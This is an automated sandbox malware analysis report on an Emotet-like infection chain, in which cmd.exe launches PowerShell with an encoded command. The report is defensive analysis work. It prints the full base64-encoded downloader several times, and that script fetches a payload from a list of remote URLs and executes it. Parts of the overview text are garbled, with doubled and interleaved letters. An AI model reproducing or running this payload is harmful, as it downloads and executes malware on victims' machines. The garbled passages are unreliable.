ID: 281116 Cookbook: defaultwindowscmdlinecookbook.jbs Time: 15:00:02 Date: 02/09/2020 Version: 29.0.0 Ocean Jasper Table of Contents
Table of Contents 2 Analysis Report 4 Overview 4 General Information 4 Detection 4 Signatures 4 Classification 4 Startup 4 Malware Configuration 5 Yara Overview 6 Sigma Overview 6 System Summary: 6 Signature Overview 6 E-Banking Fraud: 6 System Summary: 6 Data Obfuscation: 6 HIPS / PFW / Operating System Protection Evasion: 6 Mitre Att&ck Matrix 6 Behavior Graph 7 Screenshots 7 Thumbnails 7 Antivirus, Machine Learning and Genetic Malware Detection 8 Initial Sample 8 Dropped Files 8 Unpacked PE Files 8 Domains 8 URLs 8 Domains and IPs 8 Contacted Domains 9 Contacted IPs 9 General Information 9 Simulations 9 Behavior and APIs 9 Joe Sandbox View / Context 9 IPs 9 Domains 9 ASN 10 JA3 Fingerprints 10 Dropped Files 10 Created / dropped Files 10 Static File Info 10 No static file info 10 Network Behavior 10 Code Manipulations 10 Statistics 10 Behavior 10 System Behavior 11 Analysis Process: cmd.exe PID: 6904 Parent PID: 4608 11 General 11 File Activities 12 Analysis Process: conhost.exe PID: 6912 Parent PID: 6904 13 General 13 Analysis Process: powershell.exe PID: 6956 Parent PID: 6904 13 General 13 File Activities 14 File Created 14 Copyright null 2020 Page 2 of 16 File Written 15 File Read 15 Disassembly 16
Copyright null 2020 Page 3 of 16 Analysis Report
Overview
General Information Detection Signatures Classification
Analysis ID: 281116 Maallliiicciiioouuss eennccrrryyppttteedd PPoowweerrrsshheellllll ccoom… Most interesting Screenshot: SMSiiigagmlicaiao dudeset tteecnctctteerdyd:p:: EtEemd ooPttteoetwtt PPerrrosochceeslsls sc CoCmrrr…
ESEningccmrrryyapp tdtteeeddt e ppcootwewdee:rr rsEshhmeeollllll t cecmt Pddrllliioinnceee osopsp tttCiiioornn…
Ransomware Encrypted powershell cmdline option PEPonowcwreeyrrprSStehhdee llllpll cocawasseeer s aahnneoolml caamlllyyd flffioonuuenn oddption Miner Spreading
SPSioiggwmeaar S ddheeetteellc cctteaedsd:e: S Sauunssoppmiiccaiioloyuu sfso EuEnndccooddee mmaallliiiccciiioouusss SSiiiggmaa ddeettteeccttteedd::: SSuussppiiicciiioouuss EEnnccooddee… malicious
Evader Phishing
sssuusssppiiiccciiioouusss VSVeiegrrrmyy lalloo ndngeg t cecocomtemd:a aSnnudds llpliiinniceei o fffouousun nEddncode suspicious
cccllleeaann
clean CVCoeonrnyttta aloiiinnnssg l lloconongmg smsllleeaeenppdss l i((n(>>e== f 3o3 u mnidiinn))) Exploiter Banker
CCrroreenaattatteeinss s aa l oppnrrrogoc cseelsesses piiinns ss(u>us=sp p3ee nmnddiened)d moo…
Spyware Trojan / Bot ECEnrneaaabbtllleess add eepbbruougcge ppsrrrsiiiv viiinilllee sggueesspended mo Adware
MEnaaayyb sslellleesee dppe (((beeuvvgaa sspiiivrvieve i llloeoogopepss))) tttoo hhiiinnddeerrr … Score: 72 Range: 0 - 100 QMuaueyerr risiieeless e ttthphe e( e vvvooalllusumivee liiionnofffooprrrsm) aatotttiii oohnnin (((dnneaarm …
Whitelisted: false VQVeeurrreyyr illleoosnn ggth ccem vddollliiiunnmee eoo ppintttiiifoonnr m fffooauutninoddn,,, (ttthnhiaiissm… Confidence: 100% Very long cmdline option found, this
Startup
Copyright null 2020 Page 4 of 16 System is w10x64 cmd.exe (PID: 6904 cmdline: cmd /C 'powersheLL -e JABFAHAAagA1ADgAOQBpAD0AKAAoACcAWABmADAAJwArACcAaAAnACkAKwAoACcAcgAzACcAKwAnAG wAJwApACkAOwAuACgAJwBuAGUAdwAtACcAKwAnAGkAdABlAG0AJwApACAAJABlAE4AdgA6AFUAcwBlAFIAcABSAG8AZgBpAGwARQBcAFAAUwAyADkAQgA2AE MAXABMAFMAcQAzAEIAXwBMAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQASQBSAEUAYwBUAG8AUgB5ADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAG kAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBVAHIASQBgAFQAeQBQAFIAYABPAHQAYABPAGMAYABvAEwAIgAgAD0AIAAoACgAJwB0AGwAcwAnAC sAJwAxADIALAAnACkAKwAnACAAJwArACcAdAAnACsAKAAnAGwAcwAnACsAJwAxADEAJwApACsAJwAsACAAJwArACgAJwB0ACcAKwAnAGwAcwAnACkAKQA7ACQASABfADgA agB0ADUAYwAgAD0AIAAoACgAJwBaACcAKwAnAHYAaAAnACkAKwAoACcANQAnACsAJwBlAGEAJwApACsAJwBuAHYAJwApADsAJABSAF8AegBzAHYAMQBrAD0A KAAoACcAQgBjACcAKwAnAGQAdQBpACcAKQArACcAOAAnACsAJwB5ACcAKQA7ACQATABuAHgAcABoADkAbQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYA aQBsAGUAKwAoACgAJwA1AFQAJwArACgAJwB6ACcAKwAnAFAAJwArACcAcwAyADkAYgA2AGMAJwApACsAJwA1ACcAKwAoACcAVAB6ACcAKwAnAEwAcwAnACkA KwAoACcAcQAzACcAKwAnAGIAJwArACcAXwBsADUAVAB6ACcAKQApACAAIAAtAEMAUgBFAFAATABBAEMAZQAoACcANQBUACcAKwAnAHoAJwApACwAWwBjAEgA QQBSAF0AOQAyACkAKwAkAEgAXwA4AGoAdAA1AGMAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABMAGIANwA4ADYAcgB5AD0AKAAoACcA VgAzACcAKwAnAHEANAAnACkAKwAoACcAcwAyACcAKwAnAGcAJwApACkAOwAkAFMAZQA1AHoAaAB0AG0APQAmACgAJwBuAGUAdwAnACsAJwAtAG8AYgBqACcA KwAnAGUAYwB0ACcAKQAgAE4ARQB0AC4AdwBFAEIAYwBMAGkAZQBOAHQAOwAkAEYAaQA4AGkAZwBvAGIAPQAoACcAaAAnACsAJwB0AHQAJwArACcAcAAnACsA JwA6AC8AJwArACgAJwAvAHIAJwArACcAdQBlACcAKQArACcAYwBrACcAKwAnAGUAcgAnACsAKAAnAHQALQAnACsAJwBvACcAKQArACgAJwBuAGwAaQBuACcAKwAnAGUAJw ArACcALgBkACcAKQArACgAJwBlAC8AJwArACcAYwBnAGkAJwApACsAJwAtAGIAJwArACgAJwBpAG4AJwArACcALwAnACkAKwAnAEsAJwArACgAJwByACcAKwAnAGgANwBu AHIAJwArACcAMQA5ADcAOAAnACsAJwAvACoAJwApACsAJwBoACcAKwAnAHQAdAAnACsAJwBwACcAKwAoACcAcwA6ACcAKwAnAC8AJwApACsAJwAvACcAKwAo ACcAcgB1AGIAJwArACcAZQBuAHcAJwApACsAKAAnAGkAbgAnACsAJwBrAGUAbABtACcAKQArACgAJwBhAG4ALgAnACsAJwBuACcAKwAnAGwALwBjACcAKQArACcAZwBpAC cAKwAnAC0AJwArACcAYgBpACcAKwAoACcAbgAvACcAKwAnAGwAVQAnACkAKwAoACcASAAnACsAJwAvACoAaAB0ACcAKQArACcAdAAnACsAKAAnAHAAOgAnAC sAJwAvACcAKQArACgAJwAvACcAKwAnAHIAdQBwAGUAcgAnACkAKwAnAHQAJwArACgAJwBzAHQAJwArACcAcgBlACcAKQArACgAJwBlAHQALgBkACcAKwAnAGUAJwApACsA JwAvACcAKwAnAEgAJwArACgAJwBlAGkAZABpACcAKwAnAHMALQAnACkAKwAnAEUAJwArACgAJwB4ACcAKwAnAC8AYQB0AHQAYQAnACsAJwBjAGgALwB2ACcA KQArACcAQwAnACsAJwBGAFMAJwArACgAJwBhAGsAJwArACcAUABIAHEALwAqACcAKQArACcAaAAnACsAKAAnAHQAdABwADoALwAvACcAKwAnAHMAYQAnACkA KwAnAG0AJwArACgAJwBhAHQAZQBjACcAKwAnAGgAJwApACsAKAAnAG4AaQBjACcAKwAnAHMAJwApACsAJwAuAGMAJwArACgAJwBvAG0AJwArACcALwBfACcA KwAnAHMAYwByAGkAJwApACsAKAAnAHAAJwArACcAdABzAC8ARAAnACkAKwAoACcAVwB4AGkAcAAnACsAJwB3AC8AJwArACcAKgBoACcAKQArACcAdAAnACsA KAAnAHQAJwArACcAcAA6ACcAKQArACcALwAnACsAKAAnAC8AJwArACcAcwBjACcAKQArACcAaABhACcAKwAoACcAaQBkACcAKwAnAGwAJwApACsAKAAnAC4AZAAnACsAJw BlACcAKQArACcALwBiACcAKwAoACcAaQBsAGQAJwArACcAZQByAC8AJwApACsAJwBrACcAKwAnAGMAMQAnACsAKAAnAHIAcwA0ACcAKwAnADcAJwArACcANAA2ACcAKQAr ACcANQA3ACcAKwAnAC8AKgAnACsAKAAnAGgAdAAnACsAJwB0AHAAOgAnACkAKwAoACcALwAnACsAJwAvAHMAJwApACsAKAAnAGEAJwArACcAdQBlAHIAYgBl AGMAawAuACcAKwAnAG4AJwArACcAZQB0AC8AYwBnAGkALQAnACkAKwAnAGIAJwArACcAaQAnACsAJwBuACcAKwAnAC8ATQAnACsAKAAnAFcAJwArACcAUgBP AGkAcwBHAFUARAAnACsAJwBwACcAKwAnAEIALwAqAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACsAKAAnADoALwAvACcAKwAnAHMAJwApACsAKAAnAGMAJwAr ACcAaABhACcAKQArACgAJwBlACcAKwAnAGYAZQByACcAKQArACgAJwAtAGYAJwArACcAcgBhAG4AJwArACcAawAuAGQAJwApACsAKAAnAGUALwBjACcAKwAnAGcAaQAtAG IAaQBuACcAKwAnAC8AYwAnACkAKwAnAGIAJwArACgAJwBqACcAKwAnADUAcgAnACkAKwAnAG4AJwArACgAJwBxAG0ANgA1ACcAKwAnAHoAJwArACcAbQA4AD MAJwApACsAJwAxACcAKwAnADIALwAnACkALgAiAFMAYABwAEwAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAUgB1AGgAMAB0ADQAbAA9ACgAKAAnAF IAdAAnACsAJwBwACcAKQArACgAJwAxAGgAYgAnACsAJwAzACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQASwBjAG8ANABsADYAOQAgAGkAbgAgACQARgBpAD gAaQBnAG8AYgApAHsAdAByAHkAewAkAFMAZQA1AHoAaAB0AG0ALgAiAEQAbwBXAGAATgBMAE8AYQBgAEQAZgBgAGkAbABFACIAKAAkAEsAYwBvADQAbAA2AD kALAAgACQATABuAHgAcABoADkAbQApADsAJABPAHYAeQAwAHIAegBwAD0AKAAnAEkAcwAnACsAKAAnAHkAJwArACcANABrAHMAZwAnACkAKQ7AEkAZgAgACg AKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdABlACcAKwAnAG0AJwApACAAJABMAG4AeABwAGgAOQBtACkALgAiAEwAZQBuAGcAYABUAEgAIgAgAC0AZwBlACA AMgA1ADcAOAA2ACkAIAB7ACYAKAAnAEkAbgB2AG8AJwArACcAawBlAC0ASQAnACsAJwB0AGUAbQAnACkAKAAkAEwAbgB4AHAAaAA5AG0AKQA7ACQAQQA3AHo AegB6ADEAeQA9ACgAJwBMACcAKwAoACcAaQAnACsAJwBtAGIAMABfADQAJwApACkAOwBiAHIAZQBhAGsAOwAkAFUAaQA4AGQAaQB3AF8APQAoACgAJwBBAHg AYgBlACcAKwAnAHMAZgAnACkAKwAnAGcAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABEADUAZwBnAGMAXwA3AD0AKAAnAEEAaAAnACsAKAAnAGEAJwArACc AcQBkACcAKQArACcAZwBuACcAKQA=' MD5: F3BDBE3BB6F734E357235F4D5898582D) conhost.exe (PID: 6912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) powershell.exe (PID: 6956 cmdline: powersheLL -e JABFAHAAagA1ADgAOQBpAD0AKAAoACcAWABmADAAJwArACcAaAAnACkAKwAoACcAcgAzACcAKwAn AGwAJwApACkAOwAuACgAJwBuAGUAdwAtACcAKwAnAGkAdABlAG0AJwApACAAJABlAE4AdgA6AFUAcwBlAFIAcABSAG8AZgBpAGwARQBcAFAAUwAyADkAQgA2 AEMAXABMAFMAcQAzAEIAXwBMAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQASQBSAEUAYwBUAG8AUgB5ADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABv AGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBVAHIASQBgAFQAeQBQAFIAYABPAHQAYABPAGMAYABvAEwAIgAgAD0AIAAoACgAJwB0AGwAcwAn ACsAJwAxADIALAAnACkAKwAnACAAJwArACcAdAAnACsAKAAnAGwAcwAnACsAJwAxADEAJwApACsAJwAsACAAJwArACgAJwB0ACcAKwAnAGwAcwAnACkAKQA7 ACQASABfADgAagB0ADUAYwAgAD0AIAAoACgAJwBaACcAKwAnAHYAaAAnACkAKwAoACcANQAnACsAJwBlAGEAJwApACsAJwBuAHYAJwApADsAJABSAF8AegBz AHYAMQBrAD0AKAAoACcAQgBjACcAKwAnAGQAdQBpACcAKQArACcAOAAnACsAJwB5ACcAKQA7ACQATABuAHgAcABoADkAbQA9ACQAZQBuAHYAOgB1AHMAZQBy AHAAcgBvAGYAaQBsAGUAKwAoACgAJwA1AFQAJwArACgAJwB6ACcAKwAnAFAAJwArACcAcwAyADkAYgA2AGMAJwApACsAJwA1ACcAKwAoACcAVAB6ACcAKwAn AEwAcwAnACkAKwAoACcAcQAzACcAKwAnAGIAJwArACcAXwBsADUAVAB6ACcAKQApACAAIAAtAEMAUgBFAFAATABBAEMAZQAoACcANQBUACcAKwAnAHoAJwAp ACwAWwBjAEgAQQBSAF0AOQAyACkAKwAkAEgAXwA4AGoAdAA1AGMAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABMAGIANwA4ADYAcgB5 AD0AKAAoACcAVgAzACcAKwAnAHEANAAnACkAKwAoACcAcwAyACcAKwAnAGcAJwApACkAOwAkAFMAZQA1AHoAaAB0AG0APQAmACgAJwBuAGUAdwAnACsAJwAt AG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4ARQB0AC4AdwBFAEIAYwBMAGkAZQBOAHQAOwAkAEYAaQA4AGkAZwBvAGIAPQAoACcAaAAnACsAJwB0AHQAJwAr ACcAcAAnACsAJwA6AC8AJwArACgAJwAvAHIAJwArACcAdQBlACcAKQArACcAYwBrACcAKwAnAGUAcgAnACsAKAAnAHQALQAnACsAJwBvACcAKQArACgAJwBu AGwAaQBuACcAKwAnAGUAJwArACcALgBkACcAKQArACgAJwBlAC8AJwArACcAYwBnAGkAJwApACsAJwAtAGIAJwArACgAJwBpAG4AJwArACcALwAnACkAKwAn AEsAJwArACgAJwByACcAKwAnAGgANwBuAHIAJwArACcAMQA5ADcAOAAnACsAJwAvACoAJwApACsAJwBoACcAKwAnAHQAdAAnACsAJwBwACcAKwAoACcAcwA6 ACcAKwAnAC8AJwApACsAJwAvACcAKwAoACcAcgB1AGIAJwArACcAZQBuAHcAJwApACsAKAAnAGkAbgAnACsAJwBrAGUAbABtACcAKQArACgAJwBhAG4ALgAn ACsAJwBuACcAKwAnAGwALwBjACcAKQArACcAZwBpACcAKwAnAC0AJwArACcAYgBpACcAKwAoACcAbgAvACcAKwAnAGwAVQAnACkAKwAoACcASAAnACsAJwAv ACoAaAB0ACcAKQArACcAdAAnACsAKAAnAHAAOgAnACsAJwAvACcAKQArACgAJwAvACcAKwAnAHIAdQBwAGUAcgAnACkAKwAnAHQAJwArACgAJwBzAHQAJwAr ACcAcgBlACcAKQArACgAJwBlAHQALgBkACcAKwAnAGUAJwApACsAJwAvACcAKwAnAEgAJwArACgAJwBlAGkAZABpACcAKwAnAHMALQAnACkAKwAnAEUAJwAr ACgAJwB4ACcAKwAnAC8AYQB0AHQAYQAnACsAJwBjAGgALwB2ACcAKQArACcAQwAnACsAJwBGAFMAJwArACgAJwBhAGsAJwArACcAUABIAHEALwAqACcAKQAr ACcAaAAnACsAKAAnAHQAdABwADoALwAvACcAKwAnAHMAYQAnACkAKwAnAG0AJwArACgAJwBhAHQAZQBjACcAKwAnAGgAJwApACsAKAAnAG4AaQBjACcAKwAn AHMAJwApACsAJwAuAGMAJwArACgAJwBvAG0AJwArACcALwBfACcAKwAnAHMAYwByAGkAJwApACsAKAAnAHAAJwArACcAdABzAC8ARAAnACkAKwAoACcAVwB4 AGkAcAAnACsAJwB3AC8AJwArACcAKgBoACcAKQArACcAdAAnACsAKAAnAHQAJwArACcAcAA6ACcAKQArACcALwAnACsAKAAnAC8AJwArACcAcwBjACcAKQAr ACcAaABhACcAKwAoACcAaQBkACcAKwAnAGwAJwApACsAKAAnAC4AZAAnACsAJwBlACcAKQArACcALwBiACcAKwAoACcAaQBsAGQAJwArACcAZQByAC8AJwAp ACsAJwBrACcAKwAnAGMAMQAnACsAKAAnAHIAcwA0ACcAKwAnADcAJwArACcANAA2ACcAKQArACcANQA3ACcAKwAnAC8AKgAnACsAKAAnAGgAdAAnACsAJwB0 AHAAOgAnACkAKwAoACcALwAnACsAJwAvAHMAJwApACsAKAAnAGEAJwArACcAdQBlAHIAYgBlAGMAawAuACcAKwAnAG4AJwArACcAZQB0AC8AYwBnAGkALQAn ACkAKwAnAGIAJwArACcAaQAnACsAJwBuACcAKwAnAC8ATQAnACsAKAAnAFcAJwArACcAUgBPAGkAcwBHAFUARAAnACsAJwBwACcAKwAnAEIALwAqAGgAdAAn ACsAJwB0ACcAKQArACcAcAAnACsAKAAnADoALwAvACcAKwAnAHMAJwApACsAKAAnAGMAJwArACcAaABhACcAKQArACgAJwBlACcAKwAnAGYAZQByACcAKQAr ACgAJwAtAGYAJwArACcAcgBhAG4AJwArACcAawAuAGQAJwApACsAKAAnAGUALwBjACcAKwAnAGcAaQAtAGIAaQBuACcAKwAnAC8AYwAnACkAKwAnAGIAJwAr ACgAJwBqACcAKwAnADUAcgAnACkAKwAnAG4AJwArACgAJwBxAG0ANgA1ACcAKwAnAHoAJwArACcAbQA4ADMAJwApACsAJwAxACcAKwAnADIALwAnACkALgAi AFMAYABwAEwAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAUgB1AGgAMAB0ADQAbAA9ACgAKAAnAFIAdAAnACsAJwBwACcAKQArACgAJwAxAGgAYgAn ACsAJwAzACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQASwBjAG8ANABsADYAOQAgAGkAbgAgACQARgBpADgAaQBnAG8AYgApAHsAdAByAHkAewAkAFMAZQA1 AHoAaAB0AG0ALgAiAEQAbwBXAGAATgBMAE8AYQBgAEQAZgBgAGkAbABFACIAKAAkAEsAYwBvADQAbAA2ADkALAAgACQATABuAHgAcABoADkAbQApADsAJABP AHYAeQAwAHIAegBwAD0AKAAnAEkAcwAnACsAKAAnAHkAJwArACcANABrAHMAZwAnACkAKQ7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdABlA CcAKwAnAG0AJwApACAAJABMAG4AeABwAGgAOQBtACkALgAiAEwAZQBuAGcAYABUAEgAIgAgAC0AZwBlACAAMgA1ADcAOAA2ACkAIAB7ACYAKAAnAEkAbgB2A G8AJwArACcAawBlAC0ASQAnACsAJwB0AGUAbQAnACkAKAAkAEwAbgB4AHAAaAA5AG0AKQA7ACQAQQA3AHoAegB6ADEAeQA9ACgAJwBMACcAKwAoACcAaQAnA CsAJwBtAGIAMABfADQAJwApACkAOwBiAHIAZQBhAGsAOwAkAFUAaQA4AGQAaQB3AF8APQAoACgAJwBBAHgAYgBlACcAKwAnAHMAZgAnACkAKwAnAGcAJwApA H0AfQBjAGEAdABjAGgAewB9AH0AJABEADUAZwBnAGMAXwA3AD0AKAAnAEEAaAAnACsAKAAnAGEAJwArACcAcQBkACcAKQArACcAZwBuACcAKQA= MD5: DBA3E6449E97D4E3DF64527EF7012A10) cleanup
Malware Configuration
Copyright null 2020 Page 5 of 16 No configs have been found
Yara Overview
No yara matches
Sigma Overview
System Summary:
Sigma detected: Emotet Process Creation
Sigma detected: Suspicious Encoded PowerShell Command Line
Signature Overview
• E-Banking Fraud • System Summary • Data Obfuscation • Hooking and other Techniques for Hiding and Protection • Malware Analysis System Evasion • Anti Debugging • HIPS / PFW / Operating System Protection Evasion • Language, Device and Operating System Detection
Click to jump to signature section
E-Banking Fraud:
Malicious encrypted Powershell command line found
System Summary:
Very long command line found
Data Obfuscation:
PowerShell case anomaly found
HIPS / PFW / Operating System Protection Evasion:
Encrypted powershell cmdline option found
Mitre Att&ck Matrix
Copyright null 2020 Page 6 of 16 Initial Privilege Credential Lateral Command Network Access Execution Persistence Escalation Defense Evasion Access Discovery Movement Collection Exfiltration and Control Effects Valid Command and Path Process Masquerading 1 OS Virtualization/Sandbox Remote Data from Exfiltration Data Eavesdrop on Accounts Scripting Interception Injection 1 1 Credential Evasion 2 Services Local Over Other Obfuscation Insecure Interpreter 1 1 Dumping System Network Network Medium Communication Default PowerShell 3 Boot or Boot or Logon Virtualization/Sandbox LSASS Process Discovery 1 Remote Data from Exfiltration Junk Data Exploit SS7 to Accounts Logon Initialization Evasion 2 Memory Desktop Removable Over Redirect Phone Initialization Scripts Protocol Media Bluetooth Calls/SMS Scripts Domain At (Linux) Logon Script Logon Script Process Security System Information SMB/Windows Data from Automated Steganography Exploit SS7 to Accounts (Windows) (Windows) Injection 1 1 Account Discovery 1 1 Admin Shares Network Exfiltration Track Device Manager Shared Location Drive Local At (Windows) Logon Script Logon Script Deobfuscate/Decode NTDS System Network Distributed Input Scheduled Protocol SIM Card Accounts (Mac) (Mac) Files or Information 1 Configuration Component Capture Transfer Impersonation Swap Discovery Object Model
Behavior Graph
Hide Legend Legend: Process Signature Created File DNS/IP Info Behavior Graph
ID: 281116 Is Dropped
Cookbook: defaultwindowscmdlinecookbook.jbs Is Windows Process Startdate: 02/09/2020 Architecture: WINDOWS Number of created Registry Values Score: 72 Number of created Files
Visual Basic Malicious encrypted Sigma detected: Emotet Very long command line Powershell command line 3 other signatures started Process Creation found Delphi found Java
.Net C# or VB.NET cmd.exe C, C++ or other language
Is malicious 1 Internet
Malicious encrypted Very long command line Encrypted powershell PowerShell case anomaly Powershell command line started started found cmdline option found found found
powershell.exe conhost.exe
6
Screenshots
Thumbnails This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Copyright null 2020 Page 7 of 16 Antivirus, Machine Learning and Genetic Malware Detection
Initial Sample
No Antivirus matches
Dropped Files
No Antivirus matches
Unpacked PE Files
No Antivirus matches
Domains
No Antivirus matches
URLs
No Antivirus matches
Domains and IPs
Copyright null 2020 Page 8 of 16 Contacted Domains
No contacted domains info
Contacted IPs
No contacted IP infos
General Information
Joe Sandbox Version: 29.0.0 Ocean Jasper Analysis ID: 281116 Start date: 02.09.2020 Start time: 15:00:02 Joe Sandbox Product: CloudBasic Overall analysis duration: 0h 1m 47s Hypervisor based Inspection enabled: false Report type: light Cookbook file name: defaultwindowscmdlinecookbook.jbs Analysis system description: w10x64 Windows 10 64 bit v1803 with Office Professional Plus 2016, IE 11, Adobe Reader DC 19, Java 8 Update 211 Number of analysed new started processes analysed: 3 Number of new started drivers analysed: 0 Number of existing processes analysed: 0 Number of existing drivers analysed: 0 Number of injected processes analysed: 0 Technologies: EGA enabled HDC enabled AMSI enabled Analysis Mode: default Analysis stop reason: Timeout Detection: MAL Classification: mal72.bank.evad.win@4/1@0/0 Cookbook Comments: Adjust boot time Enable AMSI Stop behavior analysis, all processes terminated
Simulations
Behavior and APIs
No simulations
Joe Sandbox View / Context
IPs
No context
Domains
No context
Copyright null 2020 Page 9 of 16 ASN
No context
JA3 Fingerprints
No context
Dropped Files
No context
Created / dropped Files
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File Type: data Size (bytes): 728 Entropy (8bit): 5.05097364910619 Encrypted: false MD5: 900997B3FF6514BF775CAC6FFCBB6D4B SHA1: CED01BFEE8A92DE7946C57AA3A8B9F043708E3D7 SHA-256: 740D9FC7EBE38ED3CCBB029A5592E89128F86039BABC8FEAA0CF1376201850C2 SHA-512: 3B408E288656F51077BF8104B5A02C68E34954213ECD75D45588747A5C03E5572CB7EFF6DC5A27625A4C93D6FA185260324E0BE9B387DBF48656F1044010D4E2 Malicious: false Reputation: low Preview: @...e...... H...... <@.^.L."My...:...... Microsoft.PowerShell.ConsoleHostD...... fZve...F.....x.)...... System.Management.Automati on4...... [...{a.C..%6..h...... System.Core.0...... G-.o...A...4B...... System..4...... Zg5..:O..g..q...... System.Xml..L...... 7.....J@...... ~...... #.Microso ft.Management.Infrastructure.8...... '....L..}...... System.Numerics.@...... Lo...QN......
Static File Info
No static file info
Network Behavior
No network behavior found
Code Manipulations
Statistics
Behavior
• cmd.exe Copyright null 2020 Page 10 of 16 • conhost.exe • powershell.exe
Click to jump to process
System Behavior
Analysis Process: cmd.exe PID: 6904 Parent PID: 4608
General
Start time: 15:00:47 Start date: 02/09/2020 Path: C:\Windows\SysWOW64\cmd.exe Wow64 process (32bit): true
Copyright null 2020 Page 11 of 16 Commandline: cmd /C 'powersheLL -e JABFAHAAagA1ADgAOQBpAD0AKAAoACcAWABmADAAJwArACcA aAAnACkAKwAoACcAcgAzACcAKwAnAGwAJwApACkAOwAuACgAJwBuAGUAdwAt ACcAKwAnAGkAdABlAG0AJwApACAAJABlAE4AdgA6AFUAcwBlAFIAcABSAG8A ZgBpAGwARQBcAFAAUwAyADkAQgA2AEMAXABMAFMAcQAzAEIAXwBMAFwAIAAt AGkAdABlAG0AdAB5AHAAZQAgAGQASQBSAEUAYwBUAG8AUgB5ADsAWwBOAGUA dAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6 ADoAIgBTAGUAQwBVAHIASQBgAFQAeQBQAFIAYABPAHQAYABPAGMAYABvAEwA IgAgAD0AIAAoACgAJwB0AGwAcwAnACsAJwAxADIALAAnACkAKwAnACAAJwAr ACcAdAAnACsAKAAnAGwAcwAnACsAJwAxADEAJwApACsAJwAsACAAJwArACgA JwB0ACcAKwAnAGwAcwAnACkAKQA7ACQASABfADgAagB0ADUAYwAgAD0AIAAo ACgAJwBaACcAKwAnAHYAaAAnACkAKwAoACcANQAnACsAJwBlAGEAJwApACsA JwBuAHYAJwApADsAJABSAF8AegBzAHYAMQBrAD0AKAAoACcAQgBjACcAKwAn AGQAdQBpACcAKQArACcAOAAnACsAJwB5ACcAKQA7ACQATABuAHgAcABoADkA bQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJwA1 AFQAJwArACgAJwB6ACcAKwAnAFAAJwArACcAcwAyADkAYgA2AGMAJwApACsA JwA1ACcAKwAoACcAVAB6ACcAKwAnAEwAcwAnACkAKwAoACcAcQAzACcAKwAn AGIAJwArACcAXwBsADUAVAB6ACcAKQApACAAIAAtAEMAUgBFAFAATABBAEMA ZQAoACcANQBUACcAKwAnAHoAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKwAk AEgAXwA4AGoAdAA1AGMAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcA KQApADsAJABMAGIANwA4ADYAcgB5AD0AKAAoACcAVgAzACcAKwAnAHEANAAn ACkAKwAoACcAcwAyACcAKwAnAGcAJwApACkAOwAkAFMAZQA1AHoAaAB0AG0A PQAmACgAJwBuAGUAdwAnACsAJwAtAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAg AE4ARQB0AC4AdwBFAEIAYwBMAGkAZQBOAHQAOwAkAEYAaQA4AGkAZwBvAGIA PQAoACcAaAAnACsAJwB0AHQAJwArACcAcAAnACsAJwA6AC8AJwArACgAJwAv AHIAJwArACcAdQBlACcAKQArACcAYwBrACcAKwAnAGUAcgAnACsAKAAnAHQA LQAnACsAJwBvACcAKQArACgAJwBuAGwAaQBuACcAKwAnAGUAJwArACcALgBk ACcAKQArACgAJwBlAC8AJwArACcAYwBnAGkAJwApACsAJwAtAGIAJwArACgA JwBpAG4AJwArACcALwAnACkAKwAnAEsAJwArACgAJwByACcAKwAnAGgANwBu AHIAJwArACcAMQA5ADcAOAAnACsAJwAvACoAJwApACsAJwBoACcAKwAnAHQA dAAnACsAJwBwACcAKwAoACcAcwA6ACcAKwAnAC8AJwApACsAJwAvACcAKwAo ACcAcgB1AGIAJwArACcAZQBuAHcAJwApACsAKAAnAGkAbgAnACsAJwBrAGUA bABtACcAKQArACgAJwBhAG4ALgAnACsAJwBuACcAKwAnAGwALwBjACcAKQAr ACcAZwBpACcAKwAnAC0AJwArACcAYgBpACcAKwAoACcAbgAvACcAKwAnAGwA VQAnACkAKwAoACcASAAnACsAJwAvACoAaAB0ACcAKQArACcAdAAnACsAKAAn AHAAOgAnACsAJwAvACcAKQArACgAJwAvACcAKwAnAHIAdQBwAGUAcgAnACkA KwAnAHQAJwArACgAJwBzAHQAJwArACcAcgBlACcAKQArACgAJwBlAHQALgBk ACcAKwAnAGUAJwApACsAJwAvACcAKwAnAEgAJwArACgAJwBlAGkAZABpACcA KwAnAHMALQAnACkAKwAnAEUAJwArACgAJwB4ACcAKwAnAC8AYQB0AHQAYQAn ACsAJwBjAGgALwB2ACcAKQArACcAQwAnACsAJwBGAFMAJwArACgAJwBhAGsA JwArACcAUABIAHEALwAqACcAKQArACcAaAAnACsAKAAnAHQAdABwADoALwAv ACcAKwAnAHMAYQAnACkAKwAnAG0AJwArACgAJwBhAHQAZQBjACcAKwAnAGgA JwApACsAKAAnAG4AaQBjACcAKwAnAHMAJwApACsAJwAuAGMAJwArACgAJwBv 